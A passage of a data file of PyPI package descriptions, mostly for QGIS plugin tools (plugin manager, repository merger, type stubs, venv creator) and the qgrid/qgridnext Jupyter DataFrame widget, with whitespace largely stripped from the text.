release:startandbuildcommands with minimal configuration options."} +{"package": "qgis-plugin-manager", "pacakge-description": "QGIS-Plugin-ManagerMainly designed for QGIS Server plugins, but it works also for desktop.Not tested on Windows.TheCLIAPI is not stable yet.InstallationPython 3.7minimum, you can make a Python venv if needed.python3--versionpip3installqgis-plugin-manager\npython3-mpipinstallqgis-plugin-managerEnvironment variablesQGIS-Plugin-Manager will take care of following variables :QGIS_PLUGIN_MANAGER_SOURCES_FILEfor storing a path to thesources.listotherwise, the current folder will be used.QGIS_PLUGIN_MANAGER_CACHE_DIRfor storing all XML files downloaded otherwise, the current folder will be used.cache_qgis_plugin_managerQGIS_PLUGIN_MANAGER_SKIP_SOURCES_FILE, boolean when we do not need asources.listfile, for instance to list plugins onlyQGIS_PLUGIN_MANAGER_RESTART_FILE, path where the file must be created if QGIS server needs to be restarted.\nReadthe documentation.QGIS_PLUGINPATHfor storing plugins, fromQGIS Server documentationPYTHONPATHfor importing QGIS librariesUtilisationEitheryou need to go in the directory where you are storing plugins,oryou can use the environment variableQGIS_PLUGINPATH.\nYou can read thedocumentationon QGIS Server about this variable.cd/path/where/you/have/plugins# usually on a servercd/usr/lib/qgis/plugins# on unix desktop with the default QGIS 
profilecd/home/${USER}/.local/share/QGIS/QGIS3/profiles/default/python/plugins# orexportQGIS_PLUGINPATH=/path/where/you/have/plugins$qgis-plugin-manager--help\nusage:qgis-plugin-manager[-h][-v]{init,list,remote,remove,update,upgrade,cache,search,install}...\n\noptions:-h,--helpshowthishelpmessageandexit-v,--versionshowprogram'sversionnumberandexitcommands:qgis-plugin-managercommand{init,list,remote,remove,update,upgrade,cache,search,install}initCreatethe`sources.list`withplugins.qgis.orgasremotelistListallpluginsinthedirectoryremoteListallremoteserverremoveRemoveapluginbyitsnameupdateUpdateallindexfilesupgradeUpgradeallpluginsinstalledcacheLookforaplugininthecachesearchSearchforpluginsinstallInstallapluginInitTo create the firstsources.listin the directory with at least the default repositoryhttps://plugins.qgis.org:$qgis-plugin-managerinit\n$catsources.listhttps://plugins.qgis.org/plugins/plugins.xml?qgis=3.19You can have one or many servers, one on each line.ListList all plugins installed :$qgis-plugin-managerlist\nQGISserverversion3.19.0\nListallpluginsin/home/etienne/dev/qgis/server_plugin\n\n------------------------------------------------------------------------------------------------------------------------------------|Name|Version|Flags|QGISmin|QGISmax|Author|Folderowner|Action\u26a0|------------------------------------------------------------------------------------------------------------------------------------|Lizmap|master||3.4|3.99|3Liz|root:0o755|Unkownversion||wfsOutputExtension|1.5.3|Server|3.0||3Liz|etienne:0o755|||QuickOSM|1.14.0|Processing|3.4|3.99|EtienneTrimaille|etienne:0o755|Upgradeto1.16.0||cadastre|1.6.2|Server,Processing|3.0|3.99|3liz|www-data:0o755|||atlasprint|3.2.2|Server|3.10||3Liz|www-data:0o755||------------------------------------------------------------------------------------------------------------------Install needed plugins only, mainly on QGIS serverImportant note, installonlyplugins you needyou. On QGISdesktop, plugins can slow down your computer.\nOn QGISserver, plugins are likehooksinto QGIS server, they can alter input or output of QGIS server.\nThey can produceunexpectedresult if you don't know how the plugin works. 
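On the practical side, the commands shown above are plain shell calls, so on a server they can also be driven from a provisioning script. A minimal sketch, assuming `qgis-plugin-manager` is on `PATH` and that the plugin directory is passed through the `QGIS_PLUGINPATH` variable described above (the directory path here is only an example):

```python
# Minimal sketch: run the documented CLI commands from Python.
# Assumes qgis-plugin-manager is installed and on PATH; the directory is an example.
import os
import subprocess

env = dict(os.environ, QGIS_PLUGINPATH="/path/where/you/have/plugins")

for args in (["update"], ["list"]):
    subprocess.run(["qgis-plugin-manager", *args], env=env, check=True)
```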
Please refer to their respective documentation\nor the application that needs QGIS server plugins (for instance,plugins for Lizmap Web Client)Remote$qgis-plugin-managerremote\nListofremotes:\n\nhttps://plugins.qgis.org/plugins/plugins.xml?qgis=3.22\n\n$catsources.listhttps://plugins.qgis.org/plugins/plugins.xml?qgis=[VERSION][VERSION]is a token in thesources.listfile to be replaced by the QGIS version, for instance3.22.\nIf QGIS is upgraded, the XML file will be updated as well.You don't have to set the TOKEN for all URL :https://docs.3liz.org/plugins.xmlis valid.Basic authenticationIt's possible to add a login and password in the remote URL, withusernameandpasswordin the query string :https://docs.3liz.org/private/repo.xml?username=login&password=passEvery URL is parsed, and if some credentials are found, the URL is cleaned and the request is done using the\nbasic authentication.UpdateTo fetch the XML files from each repository :$qgis-plugin-managerupdate\nDownloadinghttps://plugins.qgis.org/plugins/plugins.xml?qgis=3.19...Ok\n$ls.cache_qgis_plugin_manager/\nhttps-plugins-qgis-org-plugins-plugins-xml-qgis-3-19.xmlCacheCheck if a plugin is available :$qgis-plugin-managercacheatlasprint\nPluginatlasprint:v3.2.2availableSearchLook for plugins according to tags and title :$qgis-plugin-managersearchdataviz\nDataPlotly\nQSoccerInstallPlugins are case-sensitive and might have spaces in its name :$qgis-plugin-managerinstalldataplotly\nPlugindataplotlylatestnotfound.\nDoyoumeanmaybe'Data Plotly'?\n$qgis-plugin-managerinstall'Data Plotly'Install the latest version :$qgis-plugin-managerinstallQuickOSM\nInstallationQuickOSMlatestOkQuickOSM.1.16.0.zipor a specific version :$qgis-plugin-managerinstallQuickOSM==1.14.0\nInstallationQuickOSM1.14.0OkQuickOSM.1.14.0.zipYou can use--forceor-fto force the installation even if the plugin with the same version is already installed.Enable a pluginOn QGISserver, there isn't any setting to enable/disable a plugin.However, ondesktop, you still need to enable a plugin, the equivalent of the checkbox in the QGIS graphical plugin\nmanager.For instance, with the default profile, usually located in :/home/${USER}/.local/share/QGIS/QGIS3/profiles/default/QGIS/you need to edit theQGIS.inifile with :[PythonPlugins]nameOfThePlugin=trueUpgradeUpgrade all plugins installed :$qgis-plugin-managerupgradeYou can use--forceor-fto force the upgrade for all plugins despite their version.Note, like APT,updateis needed before to refresh the cache.Ignore plugins from the upgradeSome plugins might be installed by hand, without being installed with a remote. This command will try to upgradeall validplugins found in the directory. However, the command will fail because the plugin has been installed\nwithout a remote.It's possible to ignore such plugin by adding a fileignorePlugins.list, in your plugins' folder,\nwith a list ofplugin nameon each line. Theupgradewill not try to upgrade them.RemoveIt's possible to userm -rf folder_dirbut you can also remove by the plugin name.\nIt will take care of theQGIS_PLUGINPATHenvironment variable.$qgis-plugin-managerremoveQuickosm\nPluginname'Quickosm'notfound\nDoyoumeanmaybe'QuickOSM'?\n$qgis-plugin-managerremoveQuickOSM\nPluginQuickOSMremoved\nTip:DonotforgettorestartQGISServertoreloadplugins\ud83d\ude0eNotify upstream if a restart is neededWhen a plugin is installed or removed and if the environment variableQGIS_PLUGIN_MANAGER_RESTART_FILEis set,\nan empty file will be created or touched. 
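Since this marker is just an empty file, reacting to it can be scripted in a few lines. A minimal sketch (the restart command and the systemd unit name are assumptions for illustration, not part of qgis-plugin-manager):

```python
# Sketch: act on the restart marker described above, then clear it.
import os
import subprocess
from pathlib import Path

marker_path = os.environ.get("QGIS_PLUGIN_MANAGER_RESTART_FILE")

if marker_path and Path(marker_path).exists():
    # Restart whatever runs QGIS Server in your stack; the unit name is an assumption.
    subprocess.run(["systemctl", "restart", "qgis-server.service"], check=True)
    # The tool does not delete the marker itself (see the note that follows).
    Path(marker_path).unlink()
```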
It can notify you if QGIS Server needs to be restarted for instance.Note that you must manually remove this file.Run testsexportPYTHONPATH=/home/etienne/dev/app/qgis-master/share/qgis/python/:/usr/lib/python3/dist-packages/cdtestpython3-munittest\nflake8"} +{"package": "qgispluginreleaser", "pacakge-description": "qgispluginreleaserAdd-on for zest.releaser for releasing QGIS plugins.Zest.releaser can be extended, see itsentrypoints documentation.What we do:We hook into the \u201crelease\u201d step and create a zipfile with a version number\nand copy it to the current directory. You can scp it to a server afterwards.In the \u201cprerelease\u201d and \u201cpostrelease\u201d steps we change the version number in\nthe (mandatory) QGISmetadata.txtfile.Note: a QGIS plugin doesn\u2019t have asetup.py, so you\u2019ll need to add aversion.txtorversion.rstorVERSIONfile so that zest.releaser\nrecognizes the current directory as a releasable project and so that it can\nfind the version number somewhere. Simply put the version number (\u201c1.2\u201d) by\nitself on the first line. A newline at the end is fine.InstallationYou\u2019ll have to install it globally (or in a custom virtualenv) as qgis plugins\nnormally don\u2019t have a full python setup.The plugin checks whether there\u2019s ametadata.txt(lowercase) with aqgisMinimumVersionstring inside it. If found, the plugin runs. Otherwise\nit stays out of the way. So it should be safe to install globally.CreditsReinout van Rees started this library.Changelog of qgispluginreleaser1.1 (2020-05-25)Allow themetadata.txtto also be one subdirectory deeper.1.0 (2017-06-20)Use the codecs package in conjunction with \u201cutf8\u201d to read and write files.0.2 (2016-02-01)Qgis expects zip filenames to use a dot as name/version separator instead of\na dash. We now create the zipfile with a dot instead.0.1 (2016-01-19)Initial project structure created with nensskel.Changing versions in metadata.txt in the prerelease/postrelease step.Creating a zipfile (with version number in the filename) automatically in\nthe release step. Note that you must answer \u201cyes\u201d to the \u201ccheckout a tag?\u201d\nquestion."} +{"package": "qgis-plugin-repo", "pacakge-description": "QGIS-Plugin-RepoPresentationMerge some QGIS plugin repository togetherSingle QGIS repositoryqgis-plugin-repomergeoutput_qgis_plugin_ci.xmlall_plugins.xml\nqgis-plugin-repomergehttps://path/to/plugins_to_add.xmlall_plugins.xmlThe fileall_plugins.xmlwill be edited, according to the plugin name, plugin\nversion and its experimental flag or not. 
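To make the merge behaviour concrete, here is a conceptual sketch of combining one repository XML into another, keyed on the plugin name and its experimental flag. It is not qgis-plugin-repo's implementation; the `pyqgis_plugin` element and `experimental` child follow the usual layout of QGIS repository XML files and should be checked against your own files, while the two file names come from the example command above.

```python
# Conceptual sketch of merging one plugins.xml into another, keyed on the
# plugin name and its experimental flag -- not qgis-plugin-repo's own code.
import xml.etree.ElementTree as ET

def merge(source_xml: str, target_xml: str) -> None:
    source = ET.parse(source_xml).getroot()
    target_tree = ET.parse(target_xml)
    target = target_tree.getroot()

    def key(plugin: ET.Element) -> tuple:
        # Assumed layout: <pyqgis_plugin name="..."><experimental>True|False</experimental>...
        return plugin.get("name"), plugin.findtext("experimental", default="False")

    for incoming in source.findall("pyqgis_plugin"):
        for existing in target.findall("pyqgis_plugin"):
            if key(existing) == key(incoming):
                target.remove(existing)  # replace the matching entry
        target.append(incoming)

    target_tree.write(target_xml, xml_declaration=True, encoding="utf-8")

merge("output_qgis_plugin_ci.xml", "all_plugins.xml")
```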
In an XML file, the plugin can have\ntwo versions : one experimental and the other one not.Many QGIS repositoriesYou can also have multiple XML files like :qgis/\n\u251c\u2500\u2500plugins-3.4.xml\n\u251c\u2500\u2500plugins-3.10.xml\n\u251c\u2500\u2500plugins-3.16.xml\n\u251c\u2500\u2500plugins-3.22.xml\n\u2514\u2500\u2500plugins-3-28.xmlThen, it's possible to callqgis-plugin-repoto dispatch an XML plugin in matching QGIS XML files :qgis-plugin-repo merge output_qgis_plugin_ci.xml plugins-*.xmlAccording to QGIS minimum/maximum versions hardcoded in the XML (and therefore in the metadata.txt), only corresponding\nQGIS XML files will be edited.For now, only plugins between3.0and3.99and without a patch QGIS version number are supported.Read a QGIS repositoryYou can read an XML file :qgis-plugin-reporeadhttps://plugins.qgis.org/plugins/plugins.xml?qgis=3.10GitHub ActionsThe main purpose of this tool is to run on CI.In the plugin repository, afterQGIS-Plugin-CI:- name: Repository Dispatch\n uses: peter-evans/repository-dispatch@v1\n with:\n token: ${{ secrets.TOKEN }}\n repository: organisation/repository\n event-type: merge-plugins\n client-payload: '{\"name\": \"NAME_OF_PLUGIN\", \"version\": \"${{ env.RELEASE_VERSION }}\", \"url\": \"URL_OF_LATEST.xml\"}'Notethat QGIS-Plugin-CIpackageorreleasemust be been called with--create-plugin-repobecause this\ntool will use the XML file generated.In the main repository with adocs/plugins.xmlto edit :name:\ud83d\udd00 Plugin repositoryon:repository_dispatch:types:[merge-plugins]jobs:merge:runs-on:ubuntu-lateststeps:-run:>echo ${{ github.event.client_payload.name }}echo ${{ github.event.client_payload.version }}echo ${{ github.event.client_payload.url }}-name:Get source codeuses:actions/checkout@v2with:fetch-depth:0token:${{ secrets.BOT_HUB_TOKEN }}# Important to launch CI on a commit from a bot-name:Set up Python 3.8uses:actions/setup-python@v2.2.2with:python-version:3.8-name:Install qgis-plugin-reporun:pip3 install qgis-plugin-repo-name:Mergerun:qgis-plugin-repo merge ${{ github.event.client_payload.url }} docs/plugins.xml-name:Commit changesuses:stefanzweifel/git-auto-commit-action@v4with:commit_message:\"PublishQGISPlugin${{github.event.client_payload.name}}${{github.event.client_payload.version}}\"commit_user_name:${{ secrets.BOT_NAME }}commit_user_email:${{ secrets.BOT_MAIL }}commit_author:${{ secrets.BOT_NAME }}Testscdtests\npython-munittest"} +{"package": "qgis-plugins", "pacakge-description": "An app for serving up a QGIS Plugin Repositorytest"} +{"package": "qgis-plugin-tools", "pacakge-description": "QGIS Plugin toolsWarning: The API is not stable yet. 
Function and files may move between commits.As it's a submodule, you can configure your GIT to auto update the submodule commit by running:git config --global submodule.recurse trueThe module is helping you with:setting up some logging(QgsMessageLog, file log, remote logs...)fetching resourcesinresourcesor other foldersfetching compiled UI fileinresources/uifolderfetching compiled translation file inresources/i18nfolderremoving QRC resources file easilytranslate using thei18n.tr()function.managing the release process : zip, upload on plugins.qgis.org, tag, GitHub releaseproviding some common widgets/code for pluginssetting up a debug serverHow to install itFor a new pluginThis will create needed structure for your pluginCreate new plugin usingcookiecutter-qgis-plugin.\nThis will automatically initialize git and add qgis_plugin_tools as a submodule for the plugin.Next set up thedevelopment environment,\nedit metadata.txt with description etc. and commit changes.For existing pluginGo to the root folder of your plugin code sourcegit submodule add https://github.com/GispoCoding/qgis_plugin_tools.gitTo get most out of the submodule, try to refactor the plugin to use the defaultplugin treeAs external dependencyThis project can also be used as an external dependency. It can be installed via pip:pipinstallqgis_plugin_toolsThe project can also be installed in editable mode, but you must use setuptool's strict mode\nbecause of the submodule nature of the project:pip install -e /path/to/qgis_plugin_tools --use-pep517 --config-settings editable_mode=strictSetting up development environmentRefer todevelopmentdocumentation.How to use itRefer tousagedocumentation.Plugin tree exampleThe plugin should follow the following file tree to get most out of this module.PluginFooroot folder:plugin_repo#no '-' character!.gitmodules.pre-commit-config.yaml.gitattributes.gitignore.qgis-plugin-ci# to useqgis-plugin-cipluginname#no '-' character!.gitignoreqgis_plugins_tools/# submoduleresources/i18n/# Alternatively translations could useTransifexfi.tsfi.qmui/main_dialog.uiicons/my_icon.svg__init__.pyfoo.pymetadata.txtbuild.pytest/"} +{"package": "qgis-plutil", "pacakge-description": "plutilplutil is anopen source,\nMIT licensed library useful for writing QGis plugins.Installpip install qgis-plutilYou can also download/clone the source, in which case you have to:git clone https://github.com/pyqgis/plutil.git\npython setup.py installTo contribute a patch clone the repo, create a new branch, install in\ndevelop mode:python setup.py develop"} +{"package": "qgisstepsbar", "pacakge-description": "No description available on PyPI."} +{"package": "qgisstepui", "pacakge-description": "No description available on PyPI."} +{"package": "qgis-stubs", "pacakge-description": "Type Stubs for QGISThis package defines Python stub files (.pyi) for thePyQGISwrapper module available inQGIS.OverviewThe bulk of theqgismodule is aSIP-generated wrapper over a C++ source that is only available at runtime. 
This means that developers are \"flying blind\" when writing code that uses theqgismodule.Type stubs are a declaration-only replication of the module interface that can be parsed by IDEs, linters, or static type checkers likeMypyorPylanceto provide the same functionality available for regular Python sources.InstallationThe qgis-stubs package can be installed through pip:python-mpipinstallqgis-stubsAlternatively, you may clone and install the latest version using the repository link:python-mpipinstallgit+https://github.com/leonhard-s/qgis-stubs.gitCaveats & LimitationsThe Python modules used by QGIS are not without issues. Most of these are shared by the runtime implementation but are explicitly listed here to avoid confusion.Theqgis.3dnamespace is not valid Python syntax as it starts with a number. At runtime, this module is instead available under theqgis._3dname, and the stub files replicate this behaviour.This may lead to errors/warnings due to apparent protected access of client code, which must be silenced using# type: ignoreand/or# pylint: disable=protected-accesscomments.Some classes useNoneas the name of a member, leading to invalid Python syntax such asDataResamplingMethod.None.Use of the built-ingetattr()function together with custom type annotations can be used to work around this issue:None_:DataResamplingMethod=getattr(DataResamplingMethod,'None')Compatibility fallback names for unscoped enumerators are not available as they are \"monkey-patched\" at runtime.It was decided not to include these patches in the stubs as they lead to naming collisions.This module usesPyQt5-stubsfor its Qt types, which does not support thePyQt5.Qscisubmodule. As a result, any classes derived from theQscinamespace are typed asAnyand not checked.ContributingThis repository contains an automated type stub generator, but new releases still require some manual edits depending on the version of QGIS targeted. Support for new QGIS versions is therefore not automatic.If you encounter any issues such as missing or incorrect type hints or wish for this utility to be updated for a new version of QGIS, please docreate an issue."} +{"package": "qgis-venv-creator", "pacakge-description": "QGIS Venv CreatorSingle file and zero dependency tool to create a Python virtual environment for QGIS plugin development.Table of ContentsInstallationUsageDevelopmentLicenseInstallationThe recommended way to installqgis-venv-creator(and other Python cli tools) is to install it withpipx. Pipx will install the application in an isolated environment and make it available as a command line utility. To installpipx, follow the instructions provided athttps://github.com/pypa/pipx#install-pipx.$pipxinstallqgis-venv-creatorAlternatively, to install in your current Python environment:$pipinstallqgis-venv-creatorCopy as a scriptqgis-venv-creatoris a single Python script that can be downloaded and copied to your project root, or any other location from which you wish to use it.UsageQuick startOn your plugin root directory, run:$create-qgis-venvNote:If you have copied the script file to your project root, you can run it withpython create-qgis-venv.py.On a system where there might be multiple QGIS installations (ie. 
Windows, MacOs), you are asked to select the one you want to use for development.After the virtual environment is created, you can activate it and it will have access to the QGIS Python environment.Optionscreate-qgis-venv [-h] [--venv-parent VENV_PARENT] [--venv-name VENV_NAME]\n [--qgis-installation QGIS_INSTALLATION]\n [--qgis-installation-search-path-pattern QGIS_INSTALLATION_SEARCH_PATH_PATTERN]\n [--python-executable PYTHON_EXECUTABLE] [--debug]OptionAvailable on platformDescription-h, --helpALLShow this help message and exit--venv-parentALLPath to the parent directory of the virtual environment to be created. Most likely your project directory. Default current directory.--venv-nameALLName of the virtual environment--qgis-installationWindowsPath to the QGIS installation to use for development. Installations made with official msi and Osgeo4W installers are supported. Give the path to the 'qgis' directory inside the 'apps' directory. If not given, the user is prompted to select one.--qgis-installation-search-path-patternWindowsCustom glob pattern for QGIS installations to be selected. Can be set also with environment variable QGIS_INSTALLATION_SEARCH_PATH_PATTERN. For example \"C:\\qgis\\*\\apps\\qgis*\\\" to find installations from \"C:\\qgis\\3.32\\apps\\qgis\\\" and \"C:\\qgis\\3.28\\apps\\qgis-ltr\\\"--python-executableWindowsPath to the Python executable used by the QGIS installation. If not given, the Python executable is searched from the QGIS installation.--debugALLEnable debug loggingDevelopmentThis project usesHatchfor development and packaging. Install instructions can be found at the project's websitehttps://hatch.pypa.io/latest/install.To facilitate development with VS Code, it is recommended to create hatch environments in the project folder. You can configure hatch to do so by running:hatch config set dirs.env.virtual \".hatch\"After Hatch has created the environment, you can set your Python interpreter to use the one located in.hatch/qgis-venv-creator.Pre-commit hookThis project usespre-committo run code checks and tests before committing. 
You can install pre-commit with:pipx install pre-commitInstall pre-commit hooks to your repo with:pre-commit installLicenseqgis-venv-creatoris distributed under the terms of theMITlicense."} +{"package": "qgitc", "pacakge-description": "QGitcA file conflict viewer for gitFeaturesTwo branches view for easy comparing a conflict commit base on the file.Visualize white spaces and carriage return for easy diff compare.Syntax highlight for diff contents.Filter logs by file path or commit pattern.Copy commit summary as HTML format for pasting.Custom pattern for creating links.Collect conflict files for merging.Launch specify merge tool for specify file suffix.Builtin image diff tool for easy finding the difference.Auto finding which commit cause conflicts.File blame supportRequirementsPySide6git (command line)chardetpywin32Optional for Windows if you want record the conflict log easilypywpsrpcOptional for Linux if you want record the conflict log easilyopenpyxlOptional if no pywin32/ pywpsrpc is availableBuild & RunUsing source directlyRunqgitc.pyunder project root directory.NOTE: If you want translation other than English or updated the UI files, runpython setup.py buildfor the first time.Build from sourceRunpip install .under project root directory to install qgitc, and then runqgitccommand.Install from pypipip install qgitcShell Integrationqgitcshellregister# to unregister, run:qgitcshellunregister# to use the source directly:pythonqgitc.pyshellregister# for Linux user# if your file manager isn't the default one comes with desktop# say your desktop is Ubuntu, but use thunar as default one# use --file-manager to specify reigster forqgitchshellregister--file-manager=thunar"} +{"package": "qgmap", "pacakge-description": "Qt Google Map widget for PySide/PyQt4Features:Specify locations either by latitude, longitude pairs or street\naddresses by means of GeoCodingProgramatically centering, zooming and manipulate markersFlexible marker properties (ie. draggable, icon, title\u2026)Emits signals on user actions: dragged markers, pans or zoomsEasy to extend, thanks to the painless python-qt-javascript interfaceInstallationBy using pip:$ pip3 install qgmapFrom source:python3 setup.py --installUsageTwo main classes are provided:qgmap.GeoCoder: Retrieves geo-coordinates (latitude, longitude) from\nstreet addressesqgmap.QGoogleMap: A WebView widget containing a GoogleMap, with some\nconvenience accessors to manage center, zoom, markers\u2026See the main example code at qgmap-example.pyUsing it with PyQt4By default the classes use PySide, but the code works for PyQt4 if you\nset to False the usePySide module variable by hand.Any suggestion to make this less hacky is welcome.AcknoledgementsThis Python code has been inspired in Henrik Hartz\u2019s C++ example code:https://blog.qt.digia.com/blog/2008/07/03/putting-qtwebkit-to-use-with-google-maps/"} +{"package": "qgofer", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "q-gomoku", "pacakge-description": "No description available on PyPI."} +{"package": "qgprofiler", "pacakge-description": "qgprofiler==============QGProfiler is a simple, user controlled profiler. 
It differs fromother profilers in that it provides the programmer the control ofgranularity with which various parts of the program are profiled.By doing this, the programmer can keep profiling overhead low(QGProfiler is meant to be used in production), while still gettingvisibility in the most important components of the program.Installation--------------using pip:```sh$ pip install qgprofiler```using setuptools:```sh$ git clone https://github.com/quantumgraph/qgprofiler$ cd qgprofiler$ python setup.py install```Usage--------------This module consists two main classes **QGProfiler** and **QGProfileAggregator**. Their usage is described and demonstrated below.### QGProfiler:QGProfiler takes 2 definite arguments and 1 optional argument:- name for the program (this will be the root name of the stack)- output filename with path (the filename should end with .json or .xml; if path is not specified than it generates in the current folder with the given file name)- an optional custom attributes which can be attached to the node and can be updated ```attributes={'somename': 'max', 'anothername': 'sum'}``` (value can be either 'max' or 'sum'; QGProfiler will do the computation to float up the values to the parent node by the type it has been defined; the idea is to use this feature for calculating memory with max and no.of db calls made with sum feature and so on..)This class contains few functions which can be used to evaluate the time taken by each function/module and the number of times the same function/module has been called. The time taken is determined by using simple- ```push('name')``` (name can be function name/db query/class module/etc.),- ```pop()``` when the execution of the function is done or- ```pop_all()``` which helps user to pop all the nodes in stack if the user lost count of how many pushes done. After the end of the program user has to call- ```end()``` to end the root program time and then- ```generate_file()``` is used for generating either xml or json file. 
By default QGProfiler will not round the number of values while generate_file to get maximum precision, you can round those values by passing an argument like ```generate_file(rounding_no=6)``` or just ```generate_file(6)```.A Brief Example is illustrated below with the output to get started:```pythonimport timefrom qgprofiler import QGProfiler# filename extension can be either json or xmlqg_profiler = QGProfiler('program_root_name', '/path/to/your/file/filename.json', {'mem': 'max'}) # program startedqg_profiler.push('test1') # test1 startedtime.sleep(0.1) # sleep follows that some program is executedqg_profiler.update('mem', 10)# update will update the attribute of the nodeqg_profiler.push('test11') # test11 startedtime.sleep(0.5)qg_profiler.pop() # test11 endedqg_profiler.push('test12') # test12 startedtime.sleep(0.5)qg_profiler.update('mem', 10)qg_profiler.push('test121') # test121 startedtime.sleep(1.0)qg_profiler.update('mem', 30)qg_profiler.pop() # test121 endedqg_profiler.pop() # test12 endedqg_profiler.push('test12') # test12 startedtime.sleep(0.5)qg_profiler.pop() # test121 endedqg_profiler.pop() # test1 endedqg_profiler.push('test2') # test2 startedtime.sleep(0.1)qg_profiler.update('mem', 10)qg_profiler.pop() # test2 endedqg_profiler.push('test2') # test2 startedtime.sleep(0.1)qg_profiler.update('mem', 20)qg_profiler.pop() # test2 endedqg_profiler.end() # program endedqg_profiler.generate_file() # will generate the file```This generates a file which contains a json```json{\"count\": 1,\"name\": \"program_root_name\",\"value\": 2.808331,\"overhead\": 3.5e-05,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 30}},\"children\": [{\"count\": 1,\"name\": \"test1\",\"value\": 2.606762,\"overhead\": 0.00013199999999999998,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 30}},\"children\": [{\"count\": 1,\"name\": \"test11\",\"value\": 0.501054,\"overhead\": 0.00031099999999999997,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 0}},\"children\": []}, {\"count\": 2,\"name\": \"test12\",\"value\": 2.0043670000000002,\"overhead\": 0.000463,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 30}},\"children\": [{\"count\": 1,\"name\": \"test121\",\"value\": 1.001872,\"overhead\": 0.000338,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 30}},\"children\": []}]}]}, {\"count\": 2,\"name\": \"test2\",\"value\": 0.20094299999999998,\"overhead\": 0.000297,\"attributes\": {\"mem\": {\"type\": \"max\", \"value\": 20}},\"children\": []}]}```File generated if .xml is given as extension in the filename```xml```### QGProfileAggregator:QGProfileAggregator takes 2 arguments:- input filepath (takes unix level command, ex: ~/path/*.xml; takes all xml files specified in the given path)- output filename with path (the filename should end with .json or .xml or .html; if path is not specified than it generates in the current folder with the given file name)This class contains one function ```generate_file()``` which will aggregate all the files data (.xml or .json whichever is specified or it takes all the files if specified * and process only .xml / .json). This will generate .xml / .json file whichever is specified in output filename. By default QGAggregator will set an argument for rounding the number of value to 6 digits to generate_file, you can overwite it by passing it as argument like ```generate_file(rounding_no=4)``` or just ```generate_file(4)```. If the generated file output is .json or .xml, the format will be as shown as above. 
But if .html is given as the extension, it will generate a flame graph using d3 which requires active internet connection to download the required js files, and the graph will look like![Alt text](/qgprofiler/images/flamegraph-1.png?raw=true \"Flame Graph\")A Brief Example is illustrated below to use it:```pythonfrom qgprofiler import QGProfileAggregatorqg_profile_agg = QGProfileAggregator('/your/file/path/*.xml', '/path/to/your/file/filename.xml')qg_profile_agg.generate_file() # this agrregates all the json/xml files into 1 file```"} +{"package": "qgpt", "pacakge-description": "No description available on PyPI."} +{"package": "qgpu", "pacakge-description": "No description available on PyPI."} +{"package": "qgrabber", "pacakge-description": "No description available on PyPI."} +{"package": "qgrad", "pacakge-description": "No description available on PyPI."} +{"package": "qgrid", "pacakge-description": "An Interactive Grid for Sorting and Filtering DataFrames in Jupyter Notebook"} +{"package": "qgridnext", "pacakge-description": "Documentation|Demos|Presentation|ChangelogQgrid is a Jupyter widget that utilizesSlickGridto render pandas DataFrames within JupyterLab/Notebook. This allows you to explore your DataFrames with intuitive scrolling, sorting, and filtering controls, as well as edit your DataFrames by double clicking cells. Initially developed by Quantopian,its repoceased maintenance in 2020. QgridNext aims to continue maintaining and improving it for future Jupyter versions.CompatibilityQgridNext is compatible with recent versions of Jupyter:QgridNextJupyterLabNotebookVoilav2.0.0v3 - v4v5 - v7v0.2 - v0.5The test environments are provided in thetest_envsfolder. You can try the widget in these environments easily.QgridNext V2.0.0The first release v2.0.0 significantly improves compatibility and addresses bugs found in Qgrid v1.3.1.Support JupyterLab 4;Released as a prebuilt extension (now can be installed with one step);UI improvements:Fix infinitely expanding width of the container in voila <= 0.3;Prevent unexpected scrolling when clicking rows in Chrome for JupyterLab;Adapt canvas size when the sidebar width changes in JupyterLab;Fix poorly displayed left/right button of date picker;Correct text color in dark mode;Standardize HTML tags to fix poorly displayed filters;Building bug fixes:Fix inconsistent pkg name for embeddable qgrid bundle;Fix data_files finding that results in incomplete extension setup;Fix building errors for Node >= 18;Other fixes:EnsureDefaults.grid_optiondict instance are not shared across widget instances;Remove full-screen mode for voila compatibility;Remove deprecated QGridWidget alias, only QgridWidget is allowed;Replace deprecated usages for traitlets, pandas and jquery.InstallationInstalling with pip:pipinstallqgridnextRequirementsQgridNext supports Python 3.7+ and depends on the following packages:pandas>= 0.20ipywidgets>= 7numpytraitletsUsageExploring DataframesRendering your DataFrame:fromqgridimportshow_gridshow_grid(your_df)Qgrid excels in handling large DataFrames. For example, it can render a DataFrame with 10,000,000 rows in about 0.8 seconds:Column-specific options:Qgrid has the ability to set a number of options on a per column basis. This allows you to do things like explicitly specify which column should be sortable, editable, etc. 
For example, if you wanted to prevent editing on all columns except for a column named 'A', you could do the following:col_opts={'editable':False}col_defs={'A':{'editable':True}}show_grid(df,column_options=col_opts,column_definitions=col_defs)Row-specific options:Currently, Qgrid supports disabling row editing on a per-row basis, enabling row editability based on specific criteria:defcan_edit_row(row):returnrow['status']=='active'show_grid(df,row_edit_callback=can_edit_row)Updating an existing Qgrid widget: You can update an existing Qgrid widget's state using APIs likeedit_cell,change_selection,toggle_editable, andchange_grid_option.Event handlersUseonandoffmethods to attach/detach event handlers. They're available on both theqgridmodule (seeqgrid.on) and individualQgridWidgetinstances (seeqgrid.QgridWidget.on).Example:defhandle_json_updated(event,qgrid_widget):# Exclude 'viewport_changed' events since that doesn't change the DataFrameif(event['triggered_by']!='viewport_changed'):print(qgrid_widget.get_changed_df())# qgrid_widget = show_grid(...)qgrid_widget.on('json_updated',handle_json_updated)Alternatively, the traditionalobservemethod is available but not recommended due to its less granular event control:defhandle_df_change(change):print(change['new'])qgrid_widget.observe(handle_df_change,names=['_df'])Event handlers enable interesting integrations with other widgets/visualizations, like using qgrid to filter a DataFrame also displayed by another visualization.For more examples, see theevents notebook.TroubleshootIf you are not seeing the widget, check if the extension is installed and enabled:jupyterlabextensionlist\njupyterlabextensionenableqgridnext# enable it if disabledTestingMultiple test environments are provided intest_envs. You can perform automated tests by pytest, or manually test it in your browser.DevelopmentNote: JupyterLab 4 and NodeJS are required to build the extension package. You can usedev.ymlintest_envsfor a quick setup.gitclonehttps://github.com/zhihanyue/qgridnextcdqgridnext\npipinstall-ve.# Install package in development modepip install -ve .installs the package into your python environment as a symlink. It also creates symlinks of built JS extensions for your Jupyter environments automatically (implemented by our custom command insetup.py). After making any changes to the JS code, just rebuild it 